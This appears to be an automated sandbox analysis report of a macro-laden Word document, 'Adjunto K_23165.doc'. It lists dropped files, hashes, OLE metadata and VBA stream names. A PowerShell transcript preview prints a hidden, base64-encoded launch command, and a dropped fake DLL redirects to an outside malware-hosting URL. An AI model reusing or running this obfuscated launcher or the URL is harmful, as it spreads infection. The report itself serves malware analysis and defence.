                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:Iiiiiiiiii8l+4d5NFc8++lNi1mULKteKeMUKa:23d5XG+3iBWJeVKa
                                                                                                                        MD5:385EA8A7B8F77428AD84E365306356FB
                                                                                                                        SHA1:F2347F9B17E0DE1EEA3DD1CC630F2ED8C64AB9C7
                                                                                                                        SHA-256:EFC25ECE3F9F704CA4788A67FB8F06D140506D7B76D14A6968ABD51471746D28
                                                                                                                        SHA-512:C3143C891271F23B6B454162128F51AD3CB14086EBD340C6D5F40BB719B7DD0BA8C8F1FF71BCE6995B38037CE758EBBF459507BC91096583334D399410C85E3D
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview: ..(...(...(...(...(...(...(...(...(...(...(...p.r.a.t.e.s.h...p....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......>...B...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{C583EF00-E796-4BD3-951E-1A83100D3950}.tmp
                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1024
                                                                                                                        Entropy (8bit):0.05390218305374581
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:ol3lYdn:4Wn
                                                                                                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                        Malicious:false
                                                                                                                        Reputation:high, very likely benign file
                                                                                                                        Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):11606
                                                                                                                        Entropy (8bit):4.883977562702998
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                                                                                                                        MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                                                                                                                        SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                                                                                                                        SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                                                                                                                        SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                                                                                                                        Malicious:false
                                                                                                                        Reputation:high, very likely benign file
                                                                                                                        Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1196
                                                                                                                        Entropy (8bit):5.333915035046385
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:3aZPpQrLAo4KAxX5qRPD42HOoSCvKDe9tOBPnKdSl9Kd:qZPerB4nqRL/HvSCv4e9tOBfuuKd
                                                                                                                        MD5:90952CC8376AB2A92C41C4E1AC5A8B57
                                                                                                                        SHA1:C3C4B5A3F60A333148432949A7FDFEDEDEBD48A2
                                                                                                                        SHA-256:35F348406AEC4AB2875FB5A3AFAC3B5A5870339559B79989F822DF3CBCEAF0C2
                                                                                                                        SHA-512:870A7B8D82D37A9A332BCC12DF5937193AD0C53F6CAF06BD2967F03888199A8907DE72A5862607354D49ECAE7B53146DB1392F078AD82CC09C9C8ED647C861D7
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.P...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                        C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):170164
                                                                                                                        Entropy (8bit):4.366241318145334
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:fEPx2LzolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3oKmmy:fo2g8WpFpKKHHedydFeo+oQLUlPoK0
                                                                                                                        MD5:5027EDCEBD0DD691F25701ABDBDCE6CD
                                                                                                                        SHA1:0BD6A6FD3E4217ACA927F7E6E8CDCD022DC0B6D0
                                                                                                                        SHA-256:3573A2AE830F9E5122975DB59988E29A66DE3FB8D48F2D16F43B85356D6BA307
                                                                                                                        SHA-512:00D824EBE5ECDE8400556255A0B860B06732329C36D2FAD352FFA72D7267BBC3D344AFA54F81F081E41FB2586E24D72A9B4B9B12B9D3E628D1EB21E2D9E5A468
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8...8...9..l9...9..4:...:...:..`;...;..(<...<...<..T=...=...>...>...>..H?...?...@..t@...@..<A...A...B..hB.......l...B..........................$................................................ ...............................x...I..............T........................................... ...................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0g034pjb.mj1.ps1
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:very short file (no magic)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1
                                                                                                                        Entropy (8bit):0.0
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:U:U
                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                        Malicious:false
                                                                                                                        Preview: 1
                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_re1hxyqi.cvu.psm1
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:very short file (no magic)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1
                                                                                                                        Entropy (8bit):0.0
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:U:U
                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                        Malicious:false
                                                                                                                        Preview: 1
                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Adjunto K_23165.LNK
                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 13:47:13 2020, mtime=Tue Mar 16 20:26:54 2021, atime=Tue Mar 16 20:26:50 2021, length=217088, window=hide
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2170
                                                                                                                        Entropy (8bit):4.7186850424774365
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:8harYOAoKBC9SDyd/H7aB6myharYOAoKBC9SDyd/H7aB6m:8harYVoKBCgB6pharYVoKBCgB6
                                                                                                                        MD5:2E03BE37F0ABA958A7DF68D0C627871C
                                                                                                                        SHA1:D470FC25AD6B99ECEACE3F6C2CDE6469C18C2703
                                                                                                                        SHA-256:A8EDAAC87E0061E65C73D19AB093E050290E1516EA34310C45AB7D5AE5F7472C
                                                                                                                        SHA-512:382222BA7220AD4D02ED77D5CDC2F6B58A4C77013B77DF1C8729183B6B564FC6158B0243527C9D3CE7CC0408C567F6D075A4B8105294D2632469312C863A373B
                                                                                                                        Malicious:false
                                                                                                                        Preview: L..................F.... .......8.....l..............P...........................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L..pRT.....................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM.pRT......S........................a.l.f.o.n.s.....~.1.....>Q.u..Desktop.h.......NM.pRT......Y..............>..... b..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....t.2..P..pRZ. .ADJUNT~1.DOC..X......>Q.upRZ.....f.....................H...A.d.j.u.n.t.o. .K._.2.3.1.6.5...d.o.c.......Z...............-.......Y...........>.S......C:\Users\user\Desktop\Adjunto K_23165.doc..*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.A.d.j.u.n.t.o. .K._.2.3.1.6.5...d.o.c.........:..,.LB.)...Aw...`.......X.......066656...........!a..%.H.VZAj...jXt.+........W...!a..%.H.VZAj...jXt.+........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.
                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):83
                                                                                                                        Entropy (8bit):4.582492148951102
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:M1XnHZC8BPenHZCmX1XnHZCv:MhHZ7WHZ5HZs
                                                                                                                        MD5:EB2F875315EE4BA70A4E9286BD866CB0
                                                                                                                        SHA1:8F0A2AC7FD7C5A8A3B29752B4B67D72064465457
                                                                                                                        SHA-256:86652D4C55B76A8315B34F5D74939A801A5537E856263F30C88E5FD552C2DC4F
                                                                                                                        SHA-512:2B05F7B5CBFEEC72EE6F4E4E0231D2A63133C3865A41F73BFD3BF46E068FAD71925C6BD9FD4D492A6440E06C73CF8FC259FBD2EAFBA95E00081144BD3D77BC62
                                                                                                                        Malicious:false
                                                                                                                        Preview: [doc]..Adjunto K_23165.LNK=0..Adjunto K_23165.LNK=0..[doc]..Adjunto K_23165.LNK=0..
                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):162
                                                                                                                        Entropy (8bit):2.247037839680148
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Rl/ZdiY0H////9MW/1lqKLRwMzr:RtZgpKQrr
                                                                                                                        MD5:9BA8B4E73E2592F7E99C8702297F666F
                                                                                                                        SHA1:1438AD24C1442420AF45C0EF74DA9D798AAD9F93
                                                                                                                        SHA-256:85F61B0A2C031883E444D92092DB7B366BBE901E3E2E54197AE8B78251E934AC
                                                                                                                        SHA-512:FE3A42B904E3E340EF3CF67D5D9FB3479B193CBB479E8E9B36E799743DD2FD59263FAC1C7916B095A030C84C52561DA10E49042A58F09D888D5710D6B8E81364
                                                                                                                        Malicious:false
                                                                                                                        Preview: .pratesh................................................p.r.a.t.e.s.h............u.'.............................u.(..........T.......6C.........u.)..........$...
                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):22
                                                                                                                        Entropy (8bit):2.9808259362290785
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:QAlX0Gn:QKn
                                                                                                                        MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                        SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                        SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                        SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                        Malicious:false
                                                                                                                        Preview: ....p.r.a.t.e.s.h.....
                                                                                                                        C:\Users\user\Desktop\~$junto K_23165.doc
                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):162
                                                                                                                        Entropy (8bit):2.247037839680148
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Rl/ZdiY0H////9MW/1lqKLRwMzr:RtZgpKQrr
                                                                                                                        MD5:9BA8B4E73E2592F7E99C8702297F666F
                                                                                                                        SHA1:1438AD24C1442420AF45C0EF74DA9D798AAD9F93
                                                                                                                        SHA-256:85F61B0A2C031883E444D92092DB7B366BBE901E3E2E54197AE8B78251E934AC
                                                                                                                        SHA-512:FE3A42B904E3E340EF3CF67D5D9FB3479B193CBB479E8E9B36E799743DD2FD59263FAC1C7916B095A030C84C52561DA10E49042A58F09D888D5710D6B8E81364
                                                                                                                        Malicious:false
                                                                                                                        Preview: .pratesh................................................p.r.a.t.e.s.h............u.'.............................u.(..........T.......6C.........u.)..........$...
                                                                                                                        C:\Users\user\Documents\20210316\PowerShell_transcript.066656.EGeR7x3C.20210316142701.txt
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):11698
                                                                                                                        Entropy (8bit):5.0834906881041535
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:90c7SR0Ix0410SON2MUWyh8Xljk781VM7iIgTZ/QLeyE6:uN0ItwUWyh8XljFmas
                                                                                                                        MD5:FA40150A55C67E14C13BBA8805431F13
                                                                                                                        SHA1:7F2FADE7EC73E43EC8A32A1AC0CCF0B576DF452A
                                                                                                                        SHA-256:F887B22DE61D8781963B1E8563211E00F3CC5B0415D8B8CCCBEFAB98FF91A7DC
                                                                                                                        SHA-512:D75ABC064AC7D8193634523F3BCE1DB11D24D4353439750D51D00215649196A347C9831D8A5A04551346C1A4AB076A2D5E91635FED612A3E2ED73F55C1BFE1CE
                                                                                                                        Malicious:false
                                                                                                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20210316142702..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 066656 (Microsoft Windows NT 10.0.17134.0)..Host Application: POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgA
                                                                                                                        C:\Users\user\Y559jsv\Iewfmy3\Ppnq9j.dll
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):495
                                                                                                                        Entropy (8bit):5.8487179314091335
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:kxvsCk9cE3Mx04K20/XPJu5zprCCmyIm5vYI:kbxx0n/MNprI5I
                                                                                                                        MD5:DCA39B99B5F73AC11242CAEBF9C128EF
                                                                                                                        SHA1:924107ABF24814B1AE8FDB78A92A6E5241B3B281
                                                                                                                        SHA-256:3E5E72217461C0DC771D22F20DE3988D61CCD99372AE15E3617747A639AC6478
                                                                                                                        SHA-512:A1FF24DD5992BDF1E11F6689379D77933A4501EA0DC77704DE1D7A1147168A0B84D9F86209FEE92EA7C95E80054A609A0108A3CD723BE1CC02D8EF05AD645808
                                                                                                                        Malicious:false
                                                                                                                        Preview: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://tongdaihanoi.com/847346324234234/rpnvXm/?js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTYxNTkwODQzNSwiaWF0IjoxNjE1OTAxMjM1LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIycG1kYjc1MjZnZmhramd1cTAwMjFrZWgiLCJuYmYiOjE2MTU5MDEyMzUsInRzIjoxNjE1OTAxMjM1MDMyMDU0fQ.LHdzXg5j7a2-JS_hssSxOCyt6EVRpCu2dN3xaLXQPO4&sid=529043ec-865b-11eb-ad9b-19c8d4ec230d');</script></body></html>

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Communications transmit paradigms Liaison Walks Orchestrator Crossroad middleware, Author: Tom Lecomte, Template: Normal.dotm, Last Saved By: Axel Roche, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 22 15:41:00 2020, Last Saved Time/Date: Tue Dec 22 15:41:00 2020, Number of Pages: 1, Number of Words: 4420, Number of Characters: 25200, Security: 8
                                                                                                                        Entropy (8bit):6.40728300890308
                                                                                                                        TrID:
                                                                                                                        • Microsoft Word document (32009/1) 79.99%
                                                                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                                                                                                        File name:Adjunto K_23165.doc
                                                                                                                        File size:216755
                                                                                                                        MD5:0687dd1c4250049abd4c224485512ffd
                                                                                                                        SHA1:ec31df47e6c68125b5bdc9355ee5abd23d82fdbe
                                                                                                                        SHA256:6cb7ee70743f849d9c174fb6b6d672b11d7dcb0f208f869f58deb7956119500e
                                                                                                                        SHA512:5a5df7facbb9d515c33e1c09c814dc13209a82326e6c490bb492c1c01e36adbab4a4848087b6107a90dfee30c84f93d895d4560ba68613176f37412aa5e38213
                                                                                                                        SSDEEP:6144:19ufsfgIf0pLIptEZiGDDCdRG9DjpmDtdS:7ufsoIfUwtEoGDDCdRG9DjpmDtdS
                                                                                                                        File Content Preview:........................>.......................#...........&............... ...!..."...|......................................................................................................................................................................

                                                                                                                        File Icon

                                                                                                                        Icon Hash:74f4c4c6c1cac4d8

                                                                                                                        Static OLE Info

                                                                                                                        General

                                                                                                                        Document Type:OLE
                                                                                                                        Number of OLE Files:1

                                                                                                                        OLE File "Adjunto K_23165.doc"

                                                                                                                        Indicators

                                                                                                                        Has Summary Info:True
                                                                                                                        Application Name:Microsoft Office Word
                                                                                                                        Encrypted Document:False
                                                                                                                        Contains Word Document Stream:True
                                                                                                                        Contains Workbook/Book Stream:False
                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                        Contains Visio Document Stream:False
                                                                                                                        Contains ObjectPool Stream:
                                                                                                                        Flash Objects Count:
                                                                                                                        Contains VBA Macros:True

                                                                                                                        Summary

                                                                                                                        Code Page:1252
                                                                                                                        Title:
                                                                                                                        Subject:Communications transmit paradigms Liaison Walks Orchestrator Crossroad middleware
                                                                                                                        Author:Tom Lecomte
                                                                                                                        Keywords:
                                                                                                                        Comments:
                                                                                                                        Template:Normal.dotm
                                                                                                                        Last Saved By:Axel Roche
                                                                                                                        Revion Number:1
                                                                                                                        Total Edit Time:0
                                                                                                                        Create Time:2020-12-22 15:41:00
                                                                                                                        Last Saved Time:2020-12-22 15:41:00
                                                                                                                        Number of Pages:1
                                                                                                                        Number of Words:4420
                                                                                                                        Number of Characters:25200
                                                                                                                        Creating Application:Microsoft Office Word
                                                                                                                        Security:8

                                                                                                                        Document Summary

                                                                                                                        Document Code Page:1252
                                                                                                                        Number of Lines:210
                                                                                                                        Number of Paragraphs:59
                                                                                                                        Thumbnail Scaling Desired:False
                                                                                                                        Company:
                                                                                                                        Contains Dirty Links:False
                                                                                                                        Shared Document:False
                                                                                                                        Changed Hyperlinks:False
                                                                                                                        Application Version:786432

                                                                                                                        Streams with VBA

                                                                                                                        VBA File Name: Bj7zc5k612ib, Stream Size: -1
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Bj7zc5k612ib
                                                                                                                        VBA File Name:Bj7zc5k612ib
                                                                                                                        Stream Size:-1
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        False
                                                                                                                        VB_Exposed
                                                                                                                        Attribute
                                                                                                                        VB_Name
                                                                                                                        VB_Creatable
                                                                                                                        VB_PredeclaredId
                                                                                                                        VB_GlobalNameSpace
                                                                                                                        VB_Base
                                                                                                                        VB_Customizable
                                                                                                                        VB_TemplateDerived
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "Bj7zc5k612ib"
Attribute VB_Base = "0{53E03B9E-2218-45B6-85A2-C47D984847B8}{DECDBE84-7493-4018-BC88-15CC72351445}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                        VBA File Name: Hiuk_v7ho95scpn0j, Stream Size: -1
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Hiuk_v7ho95scpn0j
                                                                                                                        VBA File Name:Hiuk_v7ho95scpn0j
                                                                                                                        Stream Size:-1
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        VB_Creatable
                                                                                                                        False
                                                                                                                        VB_Exposed
                                                                                                                        Attribute
                                                                                                                        VB_Name
                                                                                                                        VB_PredeclaredId
                                                                                                                        VB_GlobalNameSpace
                                                                                                                        VB_Base
                                                                                                                        VB_Customizable
                                                                                                                        VB_TemplateDerived
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "Hiuk_v7ho95scpn0j"
Attribute VB_Base = "0{DCA2A5D6-E131-4DDA-895B-3E9822E93650}{59CEE0E1-26C4-4583-B7FF-9510385F9059}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                        VBA File Name: Hvp1hxwgx78q8fg4, Stream Size: -1
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Hvp1hxwgx78q8fg4
                                                                                                                        VBA File Name:Hvp1hxwgx78q8fg4
                                                                                                                        Stream Size:-1
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        False
                                                                                                                        VB_Exposed
                                                                                                                        Attribute
                                                                                                                        VB_Name
                                                                                                                        VB_Creatable
                                                                                                                        VB_PredeclaredId
                                                                                                                        VB_GlobalNameSpace
                                                                                                                        VB_Base
                                                                                                                        VB_Customizable
                                                                                                                        VB_TemplateDerived
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "Hvp1hxwgx78q8fg4"
Attribute VB_Base = "0{C2BABB20-D2C4-427C-9EDB-4620FFEE0F8C}{14D3B583-866E-4040-A821-3D821B8C0F73}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                        VBA File Name: Pkebr_y5xjd5hl070, Stream Size: -1
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Pkebr_y5xjd5hl070
                                                                                                                        VBA File Name:Pkebr_y5xjd5hl070
                                                                                                                        Stream Size:-1
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        False
                                                                                                                        VB_Exposed
                                                                                                                        Attribute
                                                                                                                        VB_Name
                                                                                                                        VB_Creatable
                                                                                                                        VB_PredeclaredId
                                                                                                                        VB_GlobalNameSpace
                                                                                                                        VB_Base
                                                                                                                        VB_Customizable
                                                                                                                        VB_TemplateDerived
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "Pkebr_y5xjd5hl070"
Attribute VB_Base = "0{9D897C48-94D7-48BA-981A-540C527DFECB}{D1114CBA-B9B7-4991-84EB-5C5DD038E3F9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                        VBA File Name: Seby_rq4k8mp, Stream Size: -1
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Seby_rq4k8mp
                                                                                                                        VBA File Name:Seby_rq4k8mp
                                                                                                                        Stream Size:-1
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        False
                                                                                                                        Attribute
                                                                                                                        VB_Name
                                                                                                                        VB_Creatable
                                                                                                                        VB_PredeclaredId
                                                                                                                        VB_GlobalNameSpace
                                                                                                                        VB_Base
                                                                                                                        VB_Customizable
                                                                                                                        VB_TemplateDerived
                                                                                                                        VB_Exposed
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "Seby_rq4k8mp"
Attribute VB_Base = "0{8C08A6E4-D61D-4DFA-9005-995F3C6B461B}{AB11852B-4BC8-48EF-B786-4176F752DCC1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                        VBA File Name: U2v6aydkxz3, Stream Size: -1
                                                                                                                        General
